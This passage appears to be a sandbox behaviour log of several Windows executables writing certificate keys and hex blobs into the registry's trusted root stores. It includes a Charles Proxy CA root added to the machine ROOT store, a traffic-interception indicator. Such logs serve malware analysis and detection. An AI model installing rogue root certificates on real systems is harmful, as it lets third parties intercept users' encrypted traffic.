81a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	jg2_2qua.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f19000000010000001000000018e847daffeaedafa0faaea36340ea790300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	intro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	intro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	14.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	intro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	jg2_2qua.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	jg2_2qua.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	intro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	intro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	14.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	winit.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	14.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2